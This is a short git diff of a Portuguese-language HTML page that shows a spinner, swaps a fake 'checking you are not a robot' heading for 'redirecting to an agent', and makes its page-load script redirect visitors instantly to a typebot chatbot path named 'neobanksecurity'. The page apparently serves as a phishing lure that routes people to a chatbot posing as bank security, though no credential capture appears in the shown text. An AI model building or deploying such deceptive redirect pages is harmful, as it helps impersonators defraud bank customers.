--- a/index.html
+++ b/index.html
@@ -24,13 +24,13 @@
     </style>
 </head>
 <body>
-    <h1>Conferindo se você não é um Robô</h1>
+    <h1>Redirecionando para Atendente</h1>
     <div class="loader"></div>
 
     <script>
         // Redirecionamento instantâneo
         window.onload = function() {
-            window.location.replace("https://www.exemplo.com");
+            window.location.replace("https://typebot.io/neobanksecurity");
         };
     </script>
 </body>
